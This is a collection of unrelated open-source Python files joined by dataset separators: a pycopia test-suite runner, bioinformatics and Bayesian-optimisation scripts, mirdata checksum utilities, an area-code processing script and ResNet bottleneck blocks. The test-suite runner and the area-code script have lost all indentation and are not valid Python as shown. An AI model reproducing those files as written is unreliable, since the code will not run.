# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An interface for running test cases as unattended suites.
"""
from __future__ import print_function
import os
from pycopia import logging
from pycopia import getopt
from pycopia.db import models
from pycopia.QA import testloader
SuiteRunnerInterfaceDoc = r"""
Invoke a test suite (TestSuite defined in the database) from a shell.
You can define a suite in the database, give it a name, and run it given that
name. You may also supply its id value (if you know it). If none are specified
a menu will be presented.
Usage:
%s [-hd?] suitename...
Where the arguments are suite names or suite id.
Options:
-h -- Print this help text and return.
-d -- Turn on debugging for tests.
-D -- Turn on debugging for framework.
-v -- Increase verbosity.
-i -- Set flag to run interactive tests.
-I -- Set flag to skip interactive tests.
-c or -f <file> -- Merge in extra configuration file.
-n <string> -- Add a comment to the test report.
Long-style options are passed into the test suite configuration.
"""
class SuiteRunnerInterface(object):
def __init__(self, testrunner):
self.runner = testrunner
self.dbsession = models.get_session()
cf = self.runner.config
cf.flags.DEBUG = 0
cf.flags.VERBOSE = 0
cf.flags.INTERACTIVE = False
cf.userinterfacetype = "none"
def __del__(self):
self.dbsession.close()
def __call__(self, argv):
"""Invoke the suite runner by calling it with argument list.
"""
cf = self.runner.config
optlist, extraopts, args = getopt.getopt(argv[1:], "h?dDviIc:f:n:")
for opt, optarg in optlist:
if opt in ("-h", "-?"):
print (SuiteRunnerInterfaceDoc % (os.path.basename(argv[0]),))
return
if opt == "-d":
cf.flags.DEBUG += 1
if opt == "-D":
from pycopia import autodebug # top-level debug for framework bugs
if opt == "-v":
cf.flags.VERBOSE += 1
if opt == "-i":
cf.flags.INTERACTIVE = True
if opt == "-I":
cf.flags.INTERACTIVE = False
if opt == "-c" or opt == "-f":
cf.mergefile(optarg)
if opt == "-n":
cf.comment = optarg
cf.evalupdate(extraopts)
cf.arguments = [os.path.basename(argv[0])] + argv[1:]
cf.argv = args
self.runner.set_options(extraopts)
if not args:
from pycopia import cliutils
choices = [(row.id, str(row)) for row in models.TestSuite.get_suites(self.dbsession)]
choices.insert(0, (0, "Skip it"))
chosen_id = cliutils.choose_key(dict(choices), 0, prompt="Suite? ")
if chosen_id == 0:
return
args = [chosen_id]
for testsuite in self.get_test_suites(args):
suite = self.get_suite(testsuite)
self.runner.initialize()
self.runner.run_object(suite)
self.runner.finalize()
def get_suite(self, dbsuite):
"""Return a runnable and populated test suite from a TestSuite row object."""
cf = self.runner.config
suite = testloader.get_suite(dbsuite, cf)
for dbtestcase in dbsuite.testcases:
testclass = testloader.get_test_class(dbtestcase)
if testclass is not None:
suite.add_test(testclass)
for subsuite in dbsuite.subsuites:
            suite.add_suite(self.get_suite(subsuite))  # get_suite only takes the suite row; config comes from self.runner
return suite
def get_test_suites(self, args):
"""Generator that yields valid TestSuite records from the database.
"""
TS = models.TestSuite
for suiteid in args:
try:
suiteid = int(suiteid)
except ValueError:
pass
try:
if type(suiteid) is int:
suite = self.dbsession.query(TS).get(suiteid)
else:
suite = self.dbsession.query(TS).filter(models.and_(TS.name==suiteid, TS.valid==True)).one()
except models.NoResultFound:
logging.warn("No TestSuite with id or name %r" % suiteid)
continue
else:
yield suite
| StarcoderdataPython |
28765 | """
Re-running de novo assembly, this time including reads that map to mobile elements.
"""
import os
import sys
# Setup Django environment.
sys.path.append(
os.path.join(os.path.dirname(os.path.realpath(__file__)), '../'))
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from Bio import SeqIO
from experimental.de_novo_assembly import run_velvet
from main.models import *
def identify_intervals(ag):
# First identify intervals that map to mobile elements.
genbank_filepath = get_dataset_with_type(ag.reference_genome,
Dataset.TYPE.REFERENCE_GENOME_GENBANK).get_absolute_location()
# Extract the proper genome record.
genome_record = None
with open(genbank_filepath) as input_fh:
genome_record_list = SeqIO.parse(input_fh, 'genbank')
for rec in genome_record_list:
if rec.name == 'CP006698':
genome_record = rec
assert genome_record
# Pick out the intervals we want:
# * mobile elements
# * lon gene
intervals = []
found_lon = False
for f in genome_record.features:
if f.type == 'mobile_element':
intervals.append((f.location.start, f.location.end))
if (f.type == 'gene' and 'gene' in f.qualifiers and
f.qualifiers['gene'][0] in ['lon', 'clpX']):
found_lon = True
intervals.append((f.location.start, f.location.end))
assert found_lon
assert 48 == len(intervals)
# Add buffer to each interval in case reads start before or after.
buffer_size = 150
def _add_buffer(i):
return (
max(i[0] - buffer_size, 0),
min(i[1] + buffer_size, len(genome_record))
)
intervals = [_add_buffer(i) for i in intervals]
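    # Example (added): with the 150 bp buffer an element spanning (1000, 2000) becomes
    # (850, 2150), assuming the genome is longer than 2150 bp.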
return intervals
def main():
ag = AlignmentGroup.objects.get(uid='edc74a3d')
intervals = identify_intervals(ag)
for idx, sa in enumerate(ag.experimentsampletoalignment_set.all()):
print idx + 1, 'of', ag.experimentsampletoalignment_set.count()
run_velvet(sa, force_include_reads_in_intervals=intervals,
output_dir_name='velvet_mobile_lon_clpX', force_rerun=True)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1620580 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""
Test on 1d function
"""
import warnings
warnings.filterwarnings("ignore")
import pytest
import numpy as np
import matplotlib
matplotlib.use('agg')
from nextorch import plotting, bo, utils
from nextorch.parameter import Parameter
def simple_1d(X):
"""1D function y = (6x-2)^2 * sin(12x-4)
Parameters
----------
X : numpy array or a list
1D independent variable
Returns
-------
y: numpy array
1D dependent variable
"""
try:
X.shape[1]
except:
X = np.array(X)
if len(X.shape)<2:
X = np.array([X])
y = np.array([],dtype=float)
for i in range(X.shape[0]):
ynew = (X[i]*6-2)**2*np.sin((X[i]*6-2)*2)
y = np.append(y, ynew)
y = y.reshape(X.shape)
return y
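# Sanity check (added): simple_1d(0.5) ~= 0.909, since (6*0.5 - 2)**2 * sin(2) = sin(2).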
objective_func = simple_1d
# Create a grid with a 0.25 interval
X_init = np.array([[0, 0.25, 0.5, 0.75]]).T
# Get the initial responses
Y_init = objective_func(X_init)
# Initialize an Experiment object Exp
# Set its name, the files will be saved under the folder with the same name
Exp = bo.Experiment('test_out_simple_1d')
# Define parameter space
parameter = Parameter()
Exp.define_space(parameter)
# Import the initial data
# Set unit_flag to true since the X is in a unit scale
Exp.input_data(X_init, Y_init, unit_flag = True)
# Set the optimization specifications
# Here we set the objective function, minimization as the goal
Exp.set_optim_specs(objective_func = objective_func, maximize = False)
# Set a flag for saving png figures
save_fig_flag = True
# Set the number of iterations
n_trials = 10
# Optimization loop
for i in range(n_trials):
# Generate the next experiment point
# X_new is in a unit scale
# X_new_real is in a real scale defined in X_ranges
# Select EI as the acquisition function
X_new, X_new_real, acq_func = Exp.generate_next_point(acq_func_name = 'EI')
# Get the reponse at this point
Y_new_real = objective_func(X_new_real)
# Plot the objective functions, and acqucision function
plotting.response_1d_exp(Exp, mesh_size = 1000, X_new = X_new, plot_real = True, save_fig = save_fig_flag)
plotting.acq_func_1d_exp(Exp, mesh_size = 1000,X_new = X_new, save_fig = save_fig_flag)
# Input X and Y of the next point into Exp object
# Retrain the model
Exp.run_trial(X_new, X_new_real, Y_new_real)
# Obtain the optimum
y_opt, X_opt, index_opt = Exp.get_optim()
# Make a parity plot comparing model predictions versus ground truth values
plotting.parity_exp(Exp, save_fig = save_fig_flag)
# Make a parity plot with the confidence intervals on the predictions
plotting.parity_with_ci_exp(Exp, save_fig = save_fig_flag)
# switch back to interactive mode
# matplotlib.use('TkAgg')
def test_input():
# Test on input X, Y
assert np.all(Exp.X_real[:4, :] == X_init)
assert np.all(Exp.Y_real[:4, :] == Y_init)
def test_opt():
# Test on optimal X and Y
expected_X_opt = pytest.approx(0.75, abs=0.01)
expected_Y_opt = pytest.approx(-6.02, abs=0.01)
assert X_opt[0] == expected_X_opt
assert y_opt == expected_Y_opt
| StarcoderdataPython |
3310782 | # -*- coding: utf-8 -*-
"""Utility functions for mirdata
Attributes:
NoteData (namedtuple): `intervals`, `notes`, `confidence`
F0Data (namedtuple): `times`, `frequencies`, `confidence`
LyricData (namedtuple): `start_times`, `end_times`, `lyrics`, `pronounciations`
SectionData (namedtuple): `start_times`, `end_times`, `sections`
BeatData (namedtuple): `beat_times`, `beat_positions`
ChordData (namedtuple): `start_times`, `end_times`, `chords`
KeyData (namedtuple): `start_times`, '`end_times`, `keys`
EventData (namedtuple): `start_times`, `end_times`, `event`
TempoData (namedtuple): `time`, `duration`, `value`, `confidence`
"""
from collections import namedtuple
import hashlib
import os
import json
import tqdm
from mirdata import download_utils
def md5(file_path):
"""Get md5 hash of a file.
Args:
file_path (str): File path
Returns:
md5_hash (str): md5 hash of data in file_path
"""
hash_md5 = hashlib.md5()
with open(file_path, "rb") as fhandle:
for chunk in iter(lambda: fhandle.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
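# Usage sketch (added): md5("some/local/file.wav") returns a 32-character hex digest
# that is compared against the checksum stored in the dataset index.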
def none_path_join(partial_path_list):
"""Join a list of partial paths. If any part of the path is None,
returns None.
Args:
partial_path_list (list): List of partial paths
Returns:
path or None (str or None): joined path string or None
"""
if None in partial_path_list:
return None
else:
return os.path.join(*partial_path_list)
def log_message(message, verbose=True):
"""Helper function to log message
Args:
message (str): message to log
verbose (bool): if false, the message is not logged
"""
if verbose:
print(message)
def validate(file_id, local_path, checksum, missing_files, invalid_checksums):
# validate that the file exists on disk
if not os.path.exists(local_path):
if file_id not in missing_files.keys():
missing_files[file_id] = []
missing_files[file_id].append(local_path)
# validate that the checksum matches
elif md5(local_path) != checksum:
if file_id not in invalid_checksums.keys():
invalid_checksums[file_id] = []
invalid_checksums[file_id].append(local_path)
def check_files(file_dict, data_home, verbose):
missing = {}
invalid = {}
for file_id, file in tqdm.tqdm(file_dict.items(), disable=not verbose):
# multitrack case
        if file_id == 'tracks':
continue
# tracks
else:
for tracks in file.keys():
filepath = file[tracks][0]
checksum = file[tracks][1]
if filepath is not None:
local_path = os.path.join(data_home, filepath)
validate(file_id, local_path, checksum, missing, invalid)
return missing, invalid
def check_metadata(file_dict, data_home, verbose):
missing = {}
invalid = {}
for file_id, file in tqdm.tqdm(file_dict.items(), disable=not verbose):
filepath = file[0]
checksum = file[1]
if filepath is not None:
local_path = os.path.join(data_home, filepath)
validate(file_id, local_path, checksum, missing, invalid)
return missing, invalid
def check_index(dataset_index, data_home, verbose=True):
"""check index to find out missing files and files with invalid checksum
Args:
dataset_index (list): dataset indices
data_home (str): Local home path that the dataset is being stored
verbose (bool): if true, prints validation status while running
Returns:
missing_files (list): List of file paths that are in the dataset index
but missing locally
invalid_checksums (list): List of file paths that file exists in the dataset
index but has a different checksum compare to the reference checksum
"""
missing_files = {}
invalid_checksums = {}
# check index
if 'metadata' in dataset_index and dataset_index['metadata'] is not None:
missing_metadata, invalid_metadata = check_metadata(
dataset_index['metadata'],
data_home,
verbose,
)
missing_files['metadata'] = missing_metadata
invalid_checksums['metadata'] = invalid_metadata
if 'tracks' in dataset_index and dataset_index['tracks'] is not None:
missing_tracks, invalid_tracks = check_files(
dataset_index['tracks'],
data_home,
verbose,
)
missing_files['tracks'] = missing_tracks
invalid_checksums['tracks'] = invalid_tracks
if 'multitracks' in dataset_index and dataset_index['multitracks'] is not None:
missing_multitracks, invalid_multitracks = check_files(
dataset_index['multitracks'],
data_home,
verbose,
)
missing_files['multitracks'] = missing_multitracks
invalid_checksums['multitracks'] = invalid_multitracks
return missing_files, invalid_checksums
def validator(dataset_index, data_home, verbose=True):
"""Checks the existence and validity of files stored locally with
respect to the paths and file checksums stored in the reference index.
Logs invalid checksums and missing files.
Args:
dataset_index (list): dataset indices
data_home (str): Local home path that the dataset is being stored
verbose (bool): if True (default), prints missing and invalid files
to stdout. Otherwise, this function is equivalent to check_index.
Returns:
missing_files (list): List of file paths that are in the dataset index
but missing locally.
invalid_checksums (list): List of file paths that file exists in the
dataset index but has a different checksum compare to the reference
checksum.
"""
missing_files, invalid_checksums = check_index(dataset_index, data_home, verbose)
# print path of any missing files
has_any_missing_file = False
for file_id in missing_files:
if len(missing_files[file_id]) > 0:
log_message("Files missing for {}:".format(file_id), verbose)
for fpath in missing_files[file_id]:
log_message(fpath, verbose)
log_message("-" * 20, verbose)
has_any_missing_file = True
# print path of any invalid checksums
has_any_invalid_checksum = False
for file_id in invalid_checksums:
if len(invalid_checksums[file_id]) > 0:
log_message("Invalid checksums for {}:".format(file_id), verbose)
for fpath in invalid_checksums[file_id]:
log_message(fpath, verbose)
log_message("-" * 20, verbose)
has_any_invalid_checksum = True
if not (has_any_missing_file or has_any_invalid_checksum):
log_message(
"Success: the dataset is complete and all files are valid.", verbose
)
log_message("-" * 20, verbose)
return missing_files, invalid_checksums
NoteData = namedtuple("NoteData", ["intervals", "notes", "confidence"])
F0Data = namedtuple("F0Data", ["times", "frequencies", "confidence"])
MultipitchData = namedtuple(
"MultipitchData", ["times", "frequency_list", "confidence_list"]
)
LyricData = namedtuple(
"LyricData", ["start_times", "end_times", "lyrics", "pronunciations"]
)
SectionData = namedtuple("SectionData", ["intervals", "labels"])
BeatData = namedtuple("BeatData", ["beat_times", "beat_positions"])
ChordData = namedtuple("ChordData", ["intervals", "labels"])
KeyData = namedtuple("KeyData", ["start_times", "end_times", "keys"])
TempoData = namedtuple("TempoData", ["time", "duration", "value", "confidence"])
EventData = namedtuple("EventData", ["start_times", "end_times", "event"])
def load_json_index(filename):
working_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(working_dir, "datasets/indexes", filename)) as f:
return json.load(f)
class cached_property(object):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
Source: https://github.com/bottlepy/bottle/commit/fa7733e075da0d790d809aa3d2f53071897e6f76
"""
def __init__(self, func):
self.__doc__ = getattr(func, "__doc__")
self.func = func
def __get__(self, obj, cls):
# type: (Any, type) -> Any
if obj is None:
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
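# Usage sketch (added, illustrative only):
#   class Tracks(object):
#       @cached_property
#       def index(self):
#           return load_json_index("some_index.json")  # computed on first access, cached afterwards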
class LargeData(object):
def __init__(self, index_file, metadata_load_fn=None, remote_index=None):
"""Object which loads and caches large data the first time it's
accessed.
Parameters
----------
index_file: str
File name of checksum index file to be passed to `load_json_index`
metadata_load_fn: function
Function which returns a metadata dictionary.
If None, assume the dataset has no metadata. When the
`metadata` attribute is called, raises a NotImplementedError
"""
self._metadata = None
self.index_file = index_file
self.metadata_load_fn = metadata_load_fn
self.remote_index = remote_index
@cached_property
def index(self):
if self.remote_index is not None:
working_dir = os.path.dirname(os.path.realpath(__file__))
path_index_file = os.path.join(
working_dir, "datasets/indexes", self.index_file
)
if not os.path.isfile(path_index_file):
path_indexes = os.path.join(working_dir, "datasets/indexes")
download_utils.downloader(path_indexes, remotes=self.remote_index)
return load_json_index(self.index_file)
def metadata(self, data_home):
if self.metadata_load_fn is None:
raise NotImplementedError
if self._metadata is None or self._metadata["data_home"] != data_home:
self._metadata = self.metadata_load_fn(data_home)
return self._metadata
| StarcoderdataPython |
3366179 | from django.db import models
class TreeQuerySet(models.query.QuerySet):
def get_descendants(self, *args, **kwargs):
return self.model.objects.get_queryset_descendants(self, *args, **kwargs)
get_descendants.queryset_only = True
def get_ancestors(self, *args, **kwargs):
return self.model.objects.get_queryset_ancestors(self, *args, **kwargs)
get_ancestors.queryset_only = True
| StarcoderdataPython |
1714423 | # encoding: utf-8
# 处理 var125-126
import pandas as pd
import re
# 区号
code_df = pd.read_csv("../../data/area_code.csv", encoding='gbk')
code_dict = {}
for i in range(0, len(code_df)):
code_dict.update({code_df['区号'][i]: code_df['城市'][i]})
# 省名
provinces = ('河北', '山西', '辽宁', '吉林', '江苏', '浙江', '安徽', '福建',
'江西', '山东', '河南', '湖北', '湖南', '广东', '海南', '四川',
'贵州', '云南', '陕西', '甘肃', '青海', '广西', '西藏', '宁夏',
'新疆', '黑龙江', '内蒙古')
def repl_in(s):
while (True):
search_res = re.search(r'@([0-9]\d*)@', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_left(s):
while (True):
search_res = re.search(r'^([0-9]\d*)@', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_right(s):
while (True):
search_res = re.search(r'@([0-9]\d*)$', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_only(s):
while (True):
search_res = re.search(r'^([0-9]\d*)$', s)
if search_res == None:
return s
num_str = search_res.group().replace('@', '')
num = int(num_str)
if num in code_dict.keys():
s = s.replace(num_str, code_dict[num])
else:
s = s.replace(num_str, '未知')
def repl_sheng(s):
if s == None:
return ''
if len(s) >= 4:
if (s[:2] in provinces):
return s.replace(s[:2], '')[:2] + ' '
elif (s[:3] in provinces):
return s.replace(s[:3], '')[:2] + ' '
else:
return s[:2] + ' '
elif len(s) == 3:
return s[:2] + ' '
return s + ' '
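# Example (added): repl_sheng('河北石家庄') -> '石家 ' (the province prefix is stripped
# and only the first two characters of the remaining city name are kept).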
# 处理var125,var126
def process(var):
var = var.fillna('空值')
var = var.str.strip().str.replace('[A-Z]*','')\
.str.replace('[a-z]*','').str.replace('\[|\]','')
var = var.str.strip().str.replace('省|市','').str.replace('+','')\
.str.replace(';','').str.replace('.','')
var = var.apply(repl_in).apply(repl_left).apply(repl_right).apply(repl_only)
var = var.str.replace('[0-9]*','')
var = var.str.replace(' 公司开通3G出访','').str.replace('(|)','')\
.str.replace('成都资阳眉山三地','成都').str.replace('--','未知')
var = var.str.split('@', expand=True)
for col in var:
var[col] = var[col].apply(repl_sheng)
return var.T.sum().str.strip()
| StarcoderdataPython |
3253477 | <filename>model_zoo/research/cv/dem/src/config.py<gh_stars>1-10
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
network config setting, will be used in train.py
"""
from easydict import EasyDict as edict
awa_cfg = edict({
'lr_att': 1e-5,
'wd_att': 1e-2,
'clip_att': 0.2,
'lr_word': 1e-4,
'wd_word': 1e-3,
'clip_word': 0.5,
'lr_fusion': 1e-4,
'wd_fusion': 1e-2,
'clip_fusion': 0.5,
'batch_size': 64,
})
cub_cfg = edict({
'lr_att': 1e-5,
'wd_att': 1e-2,
'clip_att': 0.5,
'batch_size': 100,
})
| StarcoderdataPython |
3355354 | import torch.nn as nn
import ipdb
class Bottleneck(nn.Module):
expansion = 4
only_2D = False
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv3d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm3d(planes)
self.conv2 = None
self.bn2 = nn.BatchNorm3d(planes)
self.conv3 = nn.Conv3d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm3d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
self.input_dim = 5
self.dilation = dilation
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck3D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, **kwargs):
super().__init__(inplanes, planes, stride, downsample, dilation)
self.conv2 = nn.Conv3d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False, dilation=(1, dilation, dilation))
class Bottleneck2D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, **kwargs):
super().__init__(inplanes, planes, stride, downsample, dilation)
# to speed up the inference process
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False, dilation=dilation)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.input_dim = 4
if isinstance(stride, int):
stride_1, stride_2 = stride, stride
else:
stride_1, stride_2 = stride[0], stride[1]
self.conv2 = nn.Conv2d(planes, planes, kernel_size=(3, 3), stride=(stride_1, stride_2),
padding=(1, 1), bias=False)
class Bottleneck2_1D(Bottleneck):
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1, nb_temporal_conv=1):
super().__init__(inplanes, planes, stride, downsample, dilation)
if isinstance(stride, int):
stride_2d, stride_1t = (1, stride, stride), (stride, 1, 1)
else:
stride_2d, stride_1t = (1, stride[1], stride[2]), (stride[0], 1, 1)
# CONV2
self.conv2 = nn.Conv3d(planes, planes, kernel_size=(1, 3, 3), stride=stride_2d,
padding=(0, dilation, dilation), bias=False, dilation=dilation)
self.conv2_1t = nn.Sequential()
for i in range(nb_temporal_conv):
temp_conv = nn.Conv3d(planes, planes, kernel_size=(3, 1, 1), stride=stride_1t,
padding=(1, 0, 0), bias=False, dilation=1)
self.conv2_1t.add_module('temp_conv_{}'.format(i), temp_conv)
self.conv2_1t.add_module(('relu_{}').format(i), nn.ReLU(inplace=True))
def forward(self, x):
residual = x
## CONV1 - 3D (1,1,1)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
## CONV2
# Spatial - 2D (1,3,3)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
# Temporal - 3D (3,1,1)
out = self.conv2_1t(out)
## CONV3 - 3D (1,1,1)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
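# Minimal shape check (added sketch; this block is not part of the original module).
# With inplanes=64, planes=16 and stride=1, planes * expansion == inplanes, so the residual
# connection needs no downsample and the input shape is preserved.
if __name__ == "__main__":
    import torch
    block = Bottleneck2_1D(64, 16, stride=1)
    x = torch.randn(2, 64, 4, 8, 8)  # (N, C, T, H, W)
    print(block(x).shape)  # expected: torch.Size([2, 64, 4, 8, 8])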
| StarcoderdataPython |